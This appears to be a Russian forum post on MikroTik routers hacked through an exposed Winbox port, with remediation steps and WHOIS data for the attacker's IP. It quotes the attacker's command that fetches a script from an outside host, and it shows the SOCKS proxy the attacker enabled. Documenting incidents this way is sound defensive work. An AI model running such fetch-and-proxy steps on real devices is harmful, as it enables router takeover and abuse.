Далее после входа злоумышленник на микротике:

/tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http

/ip socks> print
enabled: yes
port: 4145
connection-idle-timeout: 2m
max-connections: 200

Что делать ели Ваш микротик взломан таким образом?

• Надо изначально было не давать доступ к winbox из внешней сети, разрешить только с определённых айпи. +отключить webfig и прочие сервисы
• Удалить скрипт и задание планировщика.
• Выключить носки) Ip->Socks
• Менять пароли
• Шиться новой прошивкой, но не факт что она уже есть с фиксом * 6.42.6 (Current) mikrotik.com/download
  

* — Как заявил представитель Микротик уязвимость закрыта в 6.42.6 но требуется менять пароли!

It is a known fact that hacker:

1) Did scan Internet for devices with open Winbox port;
2) Download usernames and passwords;
3) Used access credentials in order to log into device as a normal user.

If router was upgraded, then it can not be hacked in such way any more. However, hacker still can access router as a normal user since he knows the username and password.

Информация об IP адресе 95.154.216.160

inetnum: 95.154.216.128 — 95.154.216.255
netname: RSTS_HARDWARE_LIMITED
descr: RSTS HARDWARE LIMITED
country: GB
admin-c: MI4535-RIPE
tech-c: MI4535-RIPE
status: ASSIGNED PA
mnt-by: RAPIDSWITCH-MNT
created: 2017-09-08T15: 50: 03Z
last-modified: 2017-09-08T15: 50: 03Z
source: RIPE

person: Mandoca Ionut
address: RSTS HARDWARE LIMITED
address: 352-356 Battersea Park Road
address: London
address: SW11 3BY
address: United Kingdom
phone: +442071014169
nic-hdl: MI4535-RIPE
mnt-by: RAPIDSWITCH-MNT
created: 2017-09-08T15: 46: 59Z
last-modified: 2017-10-31T00: 04: 00Z
source: RIPE # Filtered

% Information related to '95.154.192.0/18AS20860'

route: 95.154.192.0/18
descr: Iomart Hosting Ltd
origin: AS20860
mnt-by: RAPIDSWITCH-MNT
mnt-routes: GB10488-RIPE-MNT
created: 2012-02-21T08: 53: 24Z
last-modified: 2012-02-21T08: 53: 24Z
source: RIPE